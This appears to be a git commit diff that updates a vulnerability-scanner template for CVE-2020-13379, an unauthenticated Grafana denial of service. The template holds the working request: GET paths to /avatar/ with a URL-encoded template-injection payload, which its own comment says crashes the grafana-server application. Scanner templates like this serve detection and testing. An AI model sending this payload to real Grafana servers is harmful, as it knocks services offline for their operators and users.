Update CVE-2020-13379.yaml

patch-1
bauthard 2020-08-16 02:04:11 +05:30
parent 37891375e1
commit afe7ba568d
1 changed files with 5 additions and 8 deletions

View File

@ -1,22 +1,19 @@
# WARNING id: CVE-2020-13379
# This vulnerability results in complete crashing of the grafana-server application.
id: CVE-2020-13379-grafana-dos
info: info:
name: Unauthenticated Grafana DoS name: Unauthenticated Grafana DoS
author: pxmme1337 author: pxmme1337
severity: medium severity: medium
info: https://www.exploit-db.com/exploits/48638
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING
# This vulnerability results in complete crashing of the grafana-server application.
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D' - '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D' - '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
- "{{BaseURL}}"
- "{{BaseURL}}/" - "{{BaseURL}}/"
matchers: matchers:
- type: status - type: status